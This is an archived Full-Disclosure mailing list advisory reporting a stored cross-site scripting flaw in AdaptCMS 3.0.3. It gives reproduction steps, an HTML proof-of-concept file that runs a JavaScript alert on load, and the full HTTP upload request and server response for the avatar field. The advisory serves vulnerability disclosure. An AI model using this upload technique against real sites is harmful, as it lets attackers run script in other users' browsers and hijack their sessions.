lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <CAF2Wu1a=djO6=snv477RqrEUzMmPiFWx4fFe7QrmyzXHzDpUww@mail.gmail.com>
Date: Sun, 1 Jun 2025 16:11:43 +0100
From: Andrey Stoykov <mwebsec@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Stored XSS via File Upload - adaptcmsv3.0.3

# Exploit Title: Stored XSS via File Upload - adaptcmsv3.0.3
# Date: 06/2025
# Exploit Author: Andrey Stoykov
# Version: 3.0.3
# Tested on: Debian 12
# Blog: https://msecureltd.blogspot.com/


Stored XSS via File Upload #1:

Steps to Reproduce:

1. Login with low privilege user and visit "Profile" > "Edit Your Profile"
> "Avatar"
2. Click on "Choose File" and upload the following file


html-xss.html

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Alert Box Example</title>
    <script>
        // This function will be called when the page loads
        function showAlert() {
            alert("Hello! This is an alert box.");
        }
    </script>
</head>
<body onload="showAlert()">
    <h1>Welcome to the Alert Box Example</h1>
    <p>This page will show an alert box when loaded.</p>
</body>
</html>


// HTTP POST request uploading the XSS file

POST /adaptcms/users/edit HTTP/1.1
Host: 192.168.58.131
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0)
Gecko/20100101 Firefox/140.0
[...]

[...]
------geckoformboundary5d089e6e18a0e8706d92f371cd6484c4
Content-Disposition: form-data; name="data[User][settings][avatar]";
filename="html-xss.html"
Content-Type: text/html

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Alert Box Example</title>
    <script>
        // This function will be called when the page loads
        function showAlert() {
            alert("Hello! This is an alert box.");
        }
    </script>
</head>
<body onload="showAlert()">
    <h1>Welcome to the Alert Box Example</h1>
    <p>This page will show an alert box when loaded.</p>
</body>
</html>
------geckoformboundary5d089e6e18a0e8706d92f371cd6484c4
Content-Disposition: form-data; name="data[_Token][fields]"


// HTTP Response

HTTP/1.1 200 OK
Date: Fri, 30 May 2025 20:15:54 GMT
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev
Perl/v5.16.3
X-Powered-By: PHP/5.6.40
Content-Length: 15400
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

[...]
<img src="/adaptcms/uploads/avatars/1_html-xss.html" class="thumbnail
col-lg-2" alt="" /> <input type="hidden"
name="data[User][settings][old_avatar]" value="1_html-xss.html"
id="UserSettingsOldAvatar"/>    <div class="clearfix"></div>
[...]
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

Powered by blists - more mailing lists